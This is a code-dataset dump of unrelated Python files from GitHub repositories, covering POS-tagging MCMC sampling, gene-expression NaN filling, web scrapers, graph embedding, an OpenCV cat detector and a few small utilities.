smarttree[max_index][t][1]\n\t\t\tresult[t-1] = self.pos_dict_reverse[max_index]\n\t\t\tt -= 1\n\t\treturn [[[self.most_common(result)]*len(result)], []]\n\n\tdef gettag(self, WordTag):\n\t\tfor j in range(1, self.pos_count):\n\t\t\t\tWordTag[j] = WordTag[j-1] + WordTag[j]\n\n\t\tsum = WordTag[-1]\n\t\tif sum == 0:\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\tWordTag[j] = 1.0/12.0\n\t\telse:\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\tWordTag[j] = WordTag[j]/sum\n\n\t\trandomIndex = random.random()\n\t\toutputIndex = 0\n\t\tfor k in range(self.pos_count):\n\t\t\tif randomIndex <= WordTag[k]:\n\t\t\t\toutputIndex = k\n\t\t\t\tbreak\n\t\treturn self.pos_dict_reverse[outputIndex]\n\n\tdef smartMcmc(self, sentence, count):\n\t\tsenlen = len(sentence)\n\t\tinitialSample = []\n\t\tfor i in range(0, senlen):\n\t\t\tinitialSample.append(self.pos_dict_reverse[random.randint(0,11)])\n\t\tWordTag = numpy.zeros(shape=self.pos_count).astype(float)\n\n\t\tSampleList = []\n\t\tSampleList.append(initialSample)\n\t\tfor samples in range(1,count):\n\n\t\t\tpresample = SampleList[-1][:]\n\t\t\tSampleList.append(presample)\n\n\t\t\tfor i in range(0,senlen):\n\t\t\t\tfor j in range(self.pos_count):\n\t\t\t\t\tp_t = self.pos_dict[SampleList[-1][i-1]] if (i != 0) else 
self.pos_count\n\t\t\t\t\tn_t = self.pos_dict[SampleList[-1][i+1]] if (i != senlen-1) else self.pos_count\n\t\t\t\t\tsavedwordtag = self.getFromDict(self.cache, [sentence[i],p_t,j,n_t])\n\t\t\t\t\tif savedwordtag is not None:\n\t\t\t\t\t\tfor g in range(0, self.pos_count):\n\t\t\t\t\t\t\tWordTag[g]= savedwordtag[g]\n\t\t\t\t\telse:\n\t\t\t\t\t\tpsi = self.wsi(j)\n\t\t\t\t\t\tpwisi = self.esiwi(j,sentence[i])\n\t\t\t\t\t\tpsiminus1si = self.psiminus1si(p_t,j) if (i != 0) else 1\n\t\t\t\t\t\tpsiplus1si = self.psiplus1si(j,n_t) if (i != senlen-1) else 1\n\t\t\t\t\t\tWordTag[j] = psi * pwisi * psiminus1si * psiplus1si\n\t\t\t\t\t\tstoring = numpy.zeros(shape=self.pos_count).astype(float)\n\t\t\t\t\t\tfor g in range(0, self.pos_count):\n\t\t\t\t\t\t\tstoring[g]=WordTag[g]\n\t\t\t\t\t\tself.setInDict(self.cache,[sentence[i],p_t,j,n_t],storing)\n\t\t\t\tSampleList[samples][i] = self.gettag(WordTag)\n\n\t\treturn SampleList\n\n\n\n\tdef smartMcmcold(self, sentence, count):\n\t\tcount = count + 5\n\t\tinitialSample = []\n\t\tfor i in range(0, len(sentence)):\n\t\t\tinitialSample.append(self.pos_dict_reverse[random.randint(0,11)])\n\t\tWordTag = numpy.zeros(shape=((len(sentence)), self.pos_count)).astype(float)\n\n\t\tSampleList = []\n\t\tSampleList.append(initialSample)\n\t\tfor samples in range(1,count):\n\t\t\tpresample = SampleList[-1][:]\n\t\t\tSampleList.append(presample)\n\t\t\tfor j in range(self.pos_count):\n\t\t\t\tWordTag[0][j] = self.esiwi(j,sentence[0])*self.wsi(j)\n\t\t\t\tif len(sentence) > 1:\n\t\t\t\t\tWordTag[0][j] *= float(self.ProbTables[\"ProbTagSetTranspose\"][j][self.pos_dict[SampleList[-1][1]]])\n\n\t\t\tfor j in range(1, self.pos_count):\n\t\t\t\tWordTag[0][j] = WordTag[0][j-1] + WordTag[0][j]\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\tif WordTag.sum() == 0:\n\t\t\t\t\tWordTag[0][j] = 1.0/12.0\n\t\t\t\telse:\n\t\t\t\t\tWordTag[0][j] = WordTag[0][j]/WordTag[0][self.pos_count -1]\n\n\t\t\trandomIndex = random.random()\n\t\t\toutputIndex = 0\n\t\t\tfor k in range(self.pos_count):\n\t\t\t\tif randomIndex <= WordTag[0][k]:\n\t\t\t\t\toutputIndex = k\n\t\t\t\t\tbreak\n\t\t\tSampleList[samples][0] = self.pos_dict_reverse[outputIndex]\n\n\t\t\ta = range(1,len(sentence))\n\t\t\trandom.shuffle(a)\n\t\t\tfor i in a:\n\t\t\t\tfor j in range(self.pos_count):\n\t\t\t\t\tWordTag[i][j] = self.esiwi(j,sentence[i]) * self.esiwi(j,sentence[i]) * self.wsi(j)\n\t\t\t\t\tif i != len(sentence)-1:\n\t\t\t\t\t\tWordTag[i][j] *= float(self.ProbTables[\"ProbTagSetTranspose\"][j][self.pos_dict[SampleList[-1][i+1]]])\n\n\t\t\t\tfor y in range(self.pos_count):\n\t\t\t\t\tif WordTag.sum() == 0:\n\t\t\t\t\t\tWordTag[i][y] = 1.0/12.0\n\t\t\t\t\telse:\n\t\t\t\t\t\tWordTag[i][y] = float(float(WordTag[i][y]) / float(WordTag.sum()))\n\n\t\t\t\tfor j in range(1, self.pos_count):\n\t\t\t\t\tWordTag[i][j] = WordTag[i][j-1] + WordTag[i][j]\n\n\t\t\t\trandomIndex = random.random()\n\n\t\t\t\toutputIndex = 0\n\t\t\t\tfor k in range(self.pos_count):\n\t\t\t\t\tif randomIndex <= WordTag[i][k]:\n\t\t\t\t\t\toutputIndex = k\n\t\t\t\t\t\tbreak\n\n\t\t\t\tSampleList[samples][i] = self.pos_dict_reverse[outputIndex]\n\n\t\treturn SampleList\n\n\tdef smartmaxmarginal(self, sentence):\n\t\tsamplecount = 100\n\t\tusing = 50\n\t\tsamples = self.smartMcmc(sentence, samplecount)[-using:]\n\t\tcountmatrix = numpy.zeros(shape=(len(sentence), self.pos_count), dtype = int)\n\t\tfor i in range(0,using):\n\t\t\tfor j in range(0, len(sentence)):\n\t\t\t\tcountmatrix[j][self.pos_dict[samples[i][j]]] += 1\n\t\ttagsum = 
countmatrix.sum(axis=1)\n\t\ttagmax = countmatrix.max(axis=1)\n\t\tsolution = countmatrix.argmax(axis=1)\n\t\tvalues =[]\n\t\tsolutiontags = []\n\t\tfor c in range(0, len(sentence)):\n\t\t\tvalues.append(float(tagmax[c])/float(tagsum[c]))\n\t\t\tsolutiontags.append(self.pos_dict_reverse[solution[c]])\n\t\treturn [ [ solutiontags], [values] ]\n\n\tdef smartposterior(self, sentence, label):\n\t\tresult = 0\n\t\tfor i in range(0, len(sentence)):\n\t\t\tvalue = self.esiwi(self.pos_dict[label[i]],sentence[i])\n\t\t\tif value != 0:\n\t\t\t\tresult += math.log(value)\n\t\tvalue = self.wsi(self.pos_dict[label[0]])\n\t\tif value != 0:\n\t\t\tresult += math.log(value)\n\t\tfor i in range(1, len(sentence)):\n\t\t\tvalue = self.ProbTables[\"ProbTagSet\"][self.pos_dict[label[i-1]]][self.pos_dict[label[i]]]\n\t\t\tif value != 0:\n\t\t\t\tresult += math.log(value)\n\t\t\"\"\"\n\t\tfor i in range(0, len(sentence)):\n\t\t\tif sentence[i] in self.word_dict:\n\t\t\t\tvalue = self.ProbTables[\"PorbWord\"][self.word_dict[sentence[i]]]\n\t\t\telse:\n\t\t\t\tvalue = self.defaultWordProbability\n\t\t\tif value != 0:\n\t\t\t\tresult -= math.log(value)\n\t\t\"\"\"\n\t\treturn result#self.defaultWordProbability","repo_name":"ssable94/Social-Media-Mining","sub_path":"Classifier/test/smartcode.py","file_name":"smartcode.py","file_ext":"py","file_size_in_byte":12056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71619545864","text":"\"\"\"\nReplace NaNs in the data df of a GCT with either...\n\n0) zero,\n1) the probe median, or\n2) the probe mean.\n\"\"\"\n\nimport logging\nimport argparse\nimport os\nimport sys\n\nimport broadinstitute_psp.utils.setup_logger as setup_logger\nimport cmapPy.pandasGEXpress.subset_gctoo as sg\nimport cmapPy.pandasGEXpress.parse as parse\nimport cmapPy.pandasGEXpress.write_gct as wg\n\nlogger = logging.getLogger(setup_logger.LOGGER_NAME)\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"-verbose\", \"-v\", action=\"store_true\", default=False,\n help=\"Whether to print a bunch of output.\")\n parser.add_argument(\"in_gct_path\", type=str,\n help=\"path to input gct\")\n parser.add_argument(\"out_name\", type=str,\n help=\"what to name the output gct\")\n parser.add_argument(\"-replace_with\", \"-rw\", choices=[\"zero\", \"median\", \"mean\"],\n help=\"what to replace NaN with\", default=\"mean\")\n \n return parser\n\n\ndef main(args):\n\n # Import data\n assert os.path.exists(args.in_gct_path), (\n \"in_gct_path could not be found: {}\").format(args.in_gct_path)\n in_gct = parse.parse(args.in_gct_path)\n\n # First, check if any rows are all NaN; if so, remove them\n dropped_df = in_gct.data_df.dropna(how=\"all\")\n bools_of_remaining = in_gct.data_df.index.isin(dropped_df.index.values)\n in_gct = sg.subset_gctoo(in_gct, row_bool=bools_of_remaining)\n\n if args.replace_with == \"zero\":\n in_gct.data_df.fillna(0, inplace=True)\n\n elif args.replace_with == \"median\":\n probe_medians = in_gct.data_df.median(axis=1)\n\n for row_idx, row in enumerate(in_gct.data_df.values):\n this_row = in_gct.data_df.iloc[row_idx, :]\n this_row[this_row.isnull()] = probe_medians[row_idx]\n in_gct.data_df.iloc[row_idx, :] = this_row\n\n elif args.replace_with == \"mean\":\n probe_means = in_gct.data_df.mean(axis=1)\n\n for row_idx, row in enumerate(in_gct.data_df.values):\n this_row = in_gct.data_df.iloc[row_idx, :]\n 
this_row[this_row.isnull()] = probe_means[row_idx]\n in_gct.data_df.iloc[row_idx, :] = this_row\n\n wg.write(in_gct, args.out_name, filler_null=\"NA\")\n\nif __name__ == \"__main__\":\n args = build_parser().parse_args(sys.argv[1:])\n setup_logger.setup(verbose=args.verbose)\n\n main(args)\n","repo_name":"cmap/psp","sub_path":"broadinstitute_psp/utils/replace_nans.py","file_name":"replace_nans.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"74002782985","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(here, 'README.md')) as f:\n README = f.read()\nwith open(os.path.join(here, 'CHANGES.txt')) as f:\n CHANGES = f.read()\n\nrequires = [\n 'pyramid',\n 'pypugjs',\n 'alembic',\n 'psycopg2-binary',\n 'SQLAlchemy',\n 'pyramid_tm',\n 'transaction',\n 'pyramid_retry',\n 'zope.sqlalchemy',\n 'celery',\n 'geoip2',\n 'idna',\n 'pyyaml'\n]\n\ndev_require = [\n 'plaster_pastedeploy',\n 'waitress',\n 'pyramid_debugtoolbar',\n 'pycodestyle',\n 'sphinx',\n 'sphinc-rtd-theme',\n 'cornice_swagger',\n 'sphinxcontrib-openapi',\n 'black',\n]\n\ntests_require = [\n 'WebTest >= 1.3.1', # py3 compat\n 'pytest >= 3.7.4',\n 'pytest-cov',\n]\n\nsetup(\n name='netwark',\n version='1.0.0',\n description='netwark',\n long_description=README + '\\n\\n' + CHANGES,\n classifiers=[\n 'Programming Language :: Python',\n 'Framework :: Pyramid',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',\n ],\n author='Michael Vieira',\n author_email='contact+dev[âT]mvieira[d¤T]fr',\n url='https://github.com/themimitoof/netwark',\n keywords='network tools ping mtr traceroute geoip lookup as pyramid',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n extras_require={'testing': tests_require, 'dev': dev_require},\n install_requires=requires,\n entry_points={\n 'paste.app_factory': ['main = netwark:main'],\n 'console_scripts': [\n 'initialize_netwark_db=netwark.bin.initialize_db:main'\n ],\n },\n)\n","repo_name":"Themimitoof/netwark","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"6628019613","text":"from abc import ABCMeta, ABC, abstractmethod\nimport numpy as np\n\n\nclass StaticGraphEmbedding(ABC):\n __metaclass__ = ABCMeta\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the Embedding class\n \"\"\"\n self._method_name = None\n self._d = None\n self._X = None\n self.hyper_params.update(kwargs)\n for key in self.hyper_params.keys():\n self.__setattr__('_%s' % key, self.hyper_params[key])\n for dictionary in args:\n for key in dictionary:\n self.__setattr__('_%s' % key, dictionary[key])\n\n def get_method_name(self):\n \"\"\" Returns the name for the embedding method\n\n Return:\n The name of embedding\n \"\"\"\n return self._method_name\n\n def get_method_summary(self):\n \"\"\" Returns the summary for the embedding include method name and paramater setting\n\n Return:\n A summary string of the method\n \"\"\"\n\n return '%s_%d' % (self._method_name, self._d)\n\n def get_embedding(self):\n \"\"\" Returns the learnt embedding\n\n Return:\n A numpy array of size #nodes * d\n \"\"\"\n if self._X is None:\n raise ValueError(\"Embedding not learned yet\")\n return self._X\n\n def get_reconstructed_adj(self, X=None, 
node_l=None):\n \"\"\"Compute the adjacency matrix from the learned embedding\n\n Returns:\n A numpy array of size #nodes * #nodes containing the reconstructed adjacency matrix.\n \"\"\"\n if X is not None:\n node_num = X.shape[0]\n self._X = X\n else:\n node_num = self._node_num\n adj_mtx_r = np.zeros((node_num, node_num))\n for v_i in range(node_num):\n for v_j in range(node_num):\n if v_i == v_j:\n continue\n adj_mtx_r[v_i, v_j] = self.get_edge_weight(v_i, v_j)\n return adj_mtx_r\n\n @abstractmethod\n def learn_embedding(self, graph):\n \"\"\"Learning the graph embedding from the adjcency matrix.\n\n Args:\n graph: the graph to embed in networkx DiGraph format\n \"\"\"\n\n @abstractmethod\n def get_edge_weight(self, i, j):\n \"\"\"Compute the weight for edge between node i and node j\n\n Args:\n i, j: two node id in the graph for embedding\n Returns:\n A single number represent the weight of edge between node i and node j\n\n \"\"\"","repo_name":"palash1992/GEM","sub_path":"gem/embedding/static_graph_embedding.py","file_name":"static_graph_embedding.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":1254,"dataset":"github-code","pt":"81"} +{"seq_id":"70025048906","text":"import os\nfrom urllib import parse\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass Webtoon:\n def __init__(self, webtoon_id):\n self.webtoon_id = webtoon_id\n self.title = None\n self.author = None\n self.description = None\n self.no = None\n self.num_of_episodes = None\n self.episode_list = list()\n self.html = ''\n self.number_pages = None\n\n def get_html(self, number_page=None):\n if number_page is None:\n number_page = 1\n\n # print(f'get_html함수가 실행됨..페이지{number_page}', self.webtoon_id)\n file_path = f'data/webtoon-{self.webtoon_id}-{number_page}.html'\n address = 'https://comic.naver.com/webtoon/list.nhn?'\n params = {\n 'titleId': self.webtoon_id,\n 'page':number_page,\n }\n if os.path.exists(file_path):\n html = open(file_path, 'rt').read()\n else:\n response = requests.get(address, params)\n html = response.text\n open(file_path, 'wt').write(html)\n self.html = html\n return self.html\n\n def set_info(self):\n # print(f'set_info가 실행됨')\n html = self.html\n soup = BeautifulSoup(html, 'lxml')\n div_detail = soup.select_one('div.detail')\n self.title = div_detail.select_one('h2').contents[0].strip()\n self.author = div_detail.select_one('h2 > span.wrt_nm').contents[0].strip()\n self.description = div_detail.select_one('p').get_text(strip=True, separator='\\n')\n self.number_pages = soup.select('div.page_wrap > a.page')[-1].get_text()\n\n html = self.html\n soup = BeautifulSoup(html, 'lxml')\n tr_list = soup.select_one('table.viewList').select('tr')\n episode_list = list()\n for index, tr in enumerate(tr_list[1:]):\n if tr.get('class'):\n continue\n from urllib import parse\n url_detail = tr.select_one('td:nth-of-type(1) > a').get('href')\n query_string = parse.urlsplit(url_detail).query\n query_dict = parse.parse_qs(query_string)\n self.no = query_dict['no'][0]\n episode_list.append(self.no)\n\n self.num_of_episodes = episode_list[0]\n\n\n def crawl_episode_list(self):\n\n episode_list = list()\n for number in range(1, int(self.number_pages)+1):\n self.get_html(number)\n soup = BeautifulSoup(self.html, 'lxml')\n table = soup.select_one('table.viewList')\n tr_list = table.select('tr')\n for index, tr in enumerate(tr_list[1:]):\n if tr.get('class'):\n continue\n url_detail = 'https://comic.naver.com'+tr.select_one('td:nth-of-type(1) > 
a').get('href')\n title = tr.select_one('td:nth-of-type(2) > a').get_text(strip=True)\n from urllib import parse\n query_string = parse.urlsplit(url_detail).query\n query_dict = parse.parse_qs(query_string)\n episode_no = query_dict['no'][0]\n new_episode = Episode(\n webtoon=self,\n title = title,\n url = url_detail,\n episode_no = episode_no\n )\n episode_list.append(new_episode)\n return episode_list\n\n\nclass Episode:\n def __init__(self, webtoon, title, url, episode_no):\n self.webtoon = webtoon\n self.title = title\n self.url = url\n self.episode_no = episode_no\n\n def __repr__(self):\n return f'{self.title}'\n\n def get_image_url_list(self):\n file_path = 'data/episode_detail-{webtoon_id}-{episode_no}.html'.format(\n webtoon_id=self.webtoon.webtoon_id,\n episode_no=self.episode_no,\n )\n # print('file_path:', file_path)\n # print(self.url)\n # 위 파일이 있는지 검사\n if os.path.exists(file_path):\n # print('os.path.exists: True')\n # 있다면 읽어온 결과를 html변수에 할당\n html = open(file_path, 'rt').read()\n else:\n # 없다면 self.url에 requests를 사용해서 요청\n # 요청의 결과를 html변수에 할당\n # 요청의 결과를 file_path에 해당하는 파일에 기록\n # print('os.path.exists: False')\n # print(' http get request, url:', self.url)\n response = requests.get(self.url)\n html = response.text\n open(file_path, 'wt').write(html)\n soup = BeautifulSoup(html, 'lxml')\n img_list = soup.select('div.wt_viewer > img')\n\n # episode_image = EpisodeImage(self.webtoon, self.title, img_list)\n\n return [img.get('src') for img in img_list]\n\n\n def download_all_images(self):\n for url in self.get_image_url_list():\n self.download(url)\n print(f'{self} 저장 완료')\n\n def download(self, url_img):\n \"\"\"\n :param url_img: 실제 이미지의 URL\n :return:\n \"\"\"\n # 서버에서 거부하지 않도록 HTTP헤더 중 'Referer'항목을 채워서 요청\n url_referer = f'http://comic.naver.com/webtoon/list.nhn?titleId={self.webtoon.webtoon_id}'\n headers = {\n 'Referer': url_referer,\n }\n response = requests.get(url_img, headers=headers)\n\n # 이미지 URL에서 이미지명을 가져옴\n file_name = url_img.rsplit('/', 1)[-1]\n\n # 이미지가 저장될 폴더 경로, 폴더가 없으면 생성해준다\n dir_path = f'data/{self.webtoon.webtoon_id}/{self.episode_no}'\n os.makedirs(dir_path, exist_ok=True)\n\n # 이미지가 저장될 파일 경로, 'wb'모드로 열어 이진데이터를 기록한다\n file_path = f'{dir_path}/{file_name}'\n open(file_path, 'wb').write(response.content)\n\n\n\n\n\n\n\n\n","repo_name":"Chrisaor/naver_webtoon_crawler","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7816719846","text":"\"\"\"\r\n이름 : 박민지\r\n날짜 : 2021/04/14\r\n내용 : 파이썬 외부 패키지 설치, 특수파일 실습 교재 p239\r\n\"\"\"\r\nfrom openpyxl import Workbook\r\nimport pandas as pd\r\n\r\n# Excel 파일 읽기\r\nexam = pd.read_excel('./data/exam.xlsx')\r\nprint(exam)\r\n\r\n# Excel 파일쓰기\r\n# 새로운 엑셀파일 생성\r\nworkbook = Workbook()\r\n\r\n# 현재 sheet 활성화\r\nsheet = workbook.active\r\n\r\n# 데이터 입력\r\nsheet['A1'] = 'A1셀'\r\nsheet.append([1, 2, 3])\r\nsheet.append(['김유신', '김춘추', '장보고', '강감찬', '이순신'])\r\nsheet.cell(5, 5, '5x5 데이터')\r\nsheet.cell(6, 2, '6x2 데이터')\r\n\r\n# 파일 저장/닫기\r\nworkbook.save('C:/Users/501/Desktop/Sample.xlsx')\r\nworkbook.close()\r\n\r\nprint('Excel 파일생성 완료')","repo_name":"min0201ji/Pyhthon_Programming_Basic","sub_path":"Ch08/8_3_Excel.py","file_name":"8_3_Excel.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72393365386","text":"# import requests\n\n# url = 
\"https://m.media-amazon.com/images/I/81vDZyJQ-4L._AC_UY218_.jpg\"\n# response = requests.get(url)\n\n# with open(\"image.jpg\", \"wb\") as f:\n# f.write(response.content)\nimport requests\nfrom bs4 import BeautifulSoup\nimport random\nimport time\n\n# list of user agents to randomly choose from\nuser_agents = [\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\"\n]\n\nbrands = ['Samsung', 'Apple', 'OnePlus', 'Xiaomi'] # list of brands to search\nmodel_ram_rom = {'Samsung Galaxy S21': {'ram': None, 'rom': None},\n 'iPhone 12': {'ram': None, 'rom': None},\n 'OnePlus 9 Pro': {'ram': None, 'rom': None},\n 'Xiaomi Mi 11': {'ram': None, 'rom': None}} # dictionary of model names and RAM/ROM details\nmobile_data = [] # list to store the scraped mobile data\n\nfor brand in brands:\n url = f'https://www.amazon.com/s?k={brand}+mobile'\n headers = {'User-Agent': random.choice(user_agents)} # randomly choose a user agent\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n results = soup.find_all('div', {'data-component-type': 's-search-result'})\n\n for r in results:\n title = r.find('h2').text.strip()\n price = r.find('span', {'class': 'a-offscreen'})\n if price:\n price = price.text\n else:\n price = 'Price not available'\n rating = r.find('span', {'class': 'a-icon-alt'})\n if rating:\n rating = rating.text\n else:\n rating = 'No rating available'\n \n # check if the current mobile is one of the specified models\n for model in model_ram_rom:\n if model in title:\n ram_rom = r.find('span', {'class': 'a-size-base-plus a-color-secondary a-text-normal'})\n if ram_rom:\n ram_rom = ram_rom.text.strip().split('|')\n model_ram_rom[model]['ram'] = ram_rom[0].strip()\n model_ram_rom[model]['rom'] = ram_rom[1].strip()\n else:\n model_ram_rom[model]['ram'] = 'RAM not available'\n model_ram_rom[model]['rom'] = 'ROM'\n\nprint(mobile_data)\nprint(model_ram_rom)\n","repo_name":"Arunganesh02/E-commerce_website","sub_path":"beautiful.py","file_name":"beautiful.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"1332544707","text":"from functools import partial\nfrom random import random\nfrom threading import Thread\nimport time\nimport pandas as pd\n\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.plotting import curdoc, figure, show\n\nfrom tornado import gen\n\nnew_data = {\n 'x' : [0, 1.5, 2.5, 3.5, 4.5],\n 'y' : [0, 10, 20, 30, 40],\n #'z': [0, 1*random(), 2*random(), 3*random(), 4*random()],\n }\ndf = pd.DataFrame(new_data)\nfor c in df.keys():\n d = df[c]\n\n\"\"\"\ndata = {'x_values': [1, 2, 3, 4, 5],\n 'y_values': [6, 7, 2, 3, 6]}\n# this must only be modified from a Bokeh session callback\nsource = ColumnDataSource(data=dict(x=[0], y=[0]))\nsource.add([11, 22, 33, 44, 55], 'y_1_values')\n\np = 
figure()\np.circle(x='x_values', y='y_values', source=source)\n\"\"\"\nnew_data = {\n 'x' : [0, 2, 2.1, 3, 4],\n 'y' : [0, 1, 2, 3, 4],\n #'z': [0, 1*random(), 2*random(), 3*random(), 4*random()],\n }\ndf = pd.DataFrame(new_data)\n\ndoc = curdoc()\nsource = ColumnDataSource(data=dict(x=[0], y=[0]))\n\n@gen.coroutine\ndef update(x,y):\n for c in df.keys():\n d = df[c]\n print('d is:', d)\n source.stream(x, y)\n\ndef blocking_task():\n while True:\n # do some blocking computation\n time.sleep(0.1)\n #new_data = {\n # 'x' : [0, 1.5, 2.5, 3.5, 4.5],\n # 'y' : [0, 10, 20, 30, 40],\n #}\n #df = pd.DataFrame(new_data)\n x = 3\n y = 3\n\n doc.add_next_tick_callback(partial(update, x, y))\n\np = figure(x_range = [0,10], y_range = [0,50])\nl = p.circle(x='x', y='y', source=source)\ndoc.add_root(p)\nshow(p)\n\nthread = Thread(target=blocking_task)\nthread.start()\n","repo_name":"ZviBaratz/flics-app-bak","sub_path":"app/analysis/testapp.py","file_name":"testapp.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12480012303","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateTimeField(default=datetime.datetime(2016, 2, 13, 6, 6, 51, 11682, tzinfo=utc))),\n ('category', models.CharField(default=b'NE', max_length=2, choices=[(b'NE', b'News'), (b'EV', b'Events'), (b'RU', b'Results'), (b'RO', b'Resources')])),\n ('title', models.CharField(max_length=128)),\n ('body', models.TextField()),\n ('feature', models.BooleanField(default=True)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"benjiboi214/mmpl","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38221606847","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: cats_detector.py\n# Author: lxw\n# Date: 2/28/18 10:44 PM\n\n\"\"\"\nReferences:\n1. [Detecting cats in images with OpenCV](https://www.pyimagesearch.com/2016/06/20/detecting-cats-in-images-with-opencv/)\n2. 
[Good posts on OpenCV](https://www.pyimagesearch.com/done/)\n\"\"\"\n\ndef main():\n import argparse\n import cv2\n\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--image\", required=True, help=\"path to the input image\")\n ap.add_argument(\"-c\", \"--cascade\", default=\"../data/input/haarcascade_frontalcatface.xml\", help=\"path to cat detector haar cascade\")\n args = vars(ap.parse_args()) # \n\n # load the input image and convert it to grayscale\n image = cv2.imread(args[\"image\"])\n gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # cv2.imshow(\"Gray Cat Faces\", gray_img)\n\n # load the cat detector Haar cascade, then detect cat faces in the input image\n detector = cv2.CascadeClassifier(args[\"cascade\"])\n rects = detector.detectMultiScale(gray_img, scaleFactor=1.3, minNeighbors=10, minSize=(75, 75)) # a list of 4-tuples\n\n # loop over the cat faces and draw a rectangle surrounding each\n # for (i, (x, y, w, h)) in enumerate(rects):\n for i, (x, y, w, h) in enumerate(rects):\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv2.putText(image, \"Cat #{}\".format(i + 1), (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.55, (0, 0, 255), 2)\n\n # show the detected cat faces\n cv2.imshow(\"Cat Faces\", image)\n cv2.waitKey(0)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"lxw0109/ML-Experiments","sub_path":"CAPTCHA/OpenCV_Demo/src/cats_detector.py","file_name":"cats_detector.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"72071750665","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root: return []\n ans = []\n\n stack = [root]\n while stack:\n new_stack = []\n layer = []\n for n in stack:\n layer.append(n.val)\n if n.left: new_stack.append(n.left)\n if n.right: new_stack.append(n.right)\n stack = new_stack\n ans.append(layer)\n \n return ans\n","repo_name":"CastleWhite/LeetCodeProblems","sub_path":"102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"29930752633","text":"import unittest\n\nimport numpy as np\nimport pygame\n\nfrom ...controls.controllers import Passive\nfrom ...data.component import Component\nfrom ...data.gatherer import Gatherer\nfrom ...data.routines import ThoroughRoutine, RandomRoutine\nfrom ...examples.lazerbike.builder import create_game\nfrom ...examples.lazerbike.gamedata import GO_UP, GO_DOWN, GO_LEFT, GO_RIGHT\n\n\nclass TestLazerbikeData(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n pygame.init()\n\n players_positions = {1: (0, 0, GO_RIGHT), 2: (2, 2, GO_LEFT)}\n\n cls.loop = create_game(({1: Passive, 2: Passive}, {1: 1, 2: 2}), lines=3, columns=3,\n init_positions=players_positions, speed=200)\n\n a_priori_methods 